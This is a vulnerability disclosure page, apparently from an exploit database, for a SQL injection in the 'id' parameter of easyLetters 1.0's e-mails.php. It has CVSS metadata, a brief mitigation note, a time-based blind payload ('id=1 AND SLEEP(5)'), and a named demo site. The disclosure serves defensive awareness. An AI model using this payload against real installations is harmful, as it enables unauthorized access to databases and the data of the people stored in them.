header-logo
Suggest Exploit
vendor:
easyLetters
by:
Özkan Mustafa Akkus (AkkuS)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: easyLetters
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:easyletters:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

easyLetters 1.0 – ‘id’ SQL Injection

A SQL injection vulnerability exists in easyLetters 1.0, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in the 'e-mails.php' script. An attacker can leverage this vulnerability to gain access to the application, database, and server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: easyLetters 1.0 - 'id' SQL Injection
# Dork: N/A
# Date: 25.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/easyletters/5281396
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
====================================================
# Demo : http://pauloreg.com/newsletter/
# PoC : SQLi :

http://test.com/newsletter/e-mails.php?id=[SQLi]

Parameter: id (GET)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

====================================================